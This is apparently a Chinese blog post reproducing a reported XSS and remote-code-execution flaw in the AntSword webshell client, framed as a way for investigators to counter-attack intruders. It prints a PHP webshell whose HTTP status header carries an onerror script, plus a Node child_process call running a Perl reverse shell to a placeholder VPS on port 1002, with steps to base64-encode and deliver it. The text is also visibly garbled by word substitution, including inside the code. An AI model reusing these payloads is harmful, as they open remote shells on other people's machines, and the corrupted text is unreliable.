在中国蚁剑的GitHub项目主页,创造有人提交了一个问题,中国蚁剑存在XSS和RCE漏洞
中国蚁剑的GitHub项目问题页面
看到这里我决定搭建环境,本地复现一下
复现
1 环境准备 由于我比较那么这台安装了Xmapp的做事器就当做被攻击者黑掉的工具
既然被黑了,那肯定上了webshell。
2 准备webshell准备两个webshell,一个是验证XSS的webshell,一个是验证RCE的webshell,RCE的webshell还可以用来直接反弹攻击者的shell
XSS的WebShell如下:
<?phpheader('HTTP/1.1 500 <img src=# onerror=alert(1)>');
我们把它放到Xmapp的DashBoard目录下,然后添加到中国蚁剑运行即可看到效果
Xmapp
中国蚁剑
XSS
现在我们来反弹攻击者的shell
require('child_process').exec('perl -e \'use Socket;$i=\"大众vpsip\公众;$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"大众tcp\"大众));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\公众>&S\"大众);open(STDOUT,\公众>&S\"大众);open(STDERR,\"大众>&S\"大众);exec(\公众/bin/bash -i\"大众);};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
将上述代码中的vpsip改为取证者的vpsip(公网IP),进行BASE64编码,并与下面的代码进行合并
<?phpheader(\公众HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`base64代码`,`base64`).toString())'>\公众);?>
完成往后,依然存放到Xmapp的DashBoard目录下,然后在vps上面进行监听1002端口(随意端口都行)
Xmapp
监听端口
接着我们仿照攻击者利用中国蚁剑连接webshell
中国蚁剑
中国蚁剑立时报错
报错
但是成功反弹攻击者shell
反弹攻击者shell
成因
根据问题创造者的描述,在于中国蚁剑源码中如下文件的206行
~/source/modules/filemanage/index.js
已修复
目前中国蚁剑已修复,但对付很多攻击者来说,第一韶光若没有及时更新,则司法部门即可利用该漏洞进行调查取证、攻击溯源,而该漏洞对付打击网络犯罪必将供应很大帮助。
作者:净水川崎
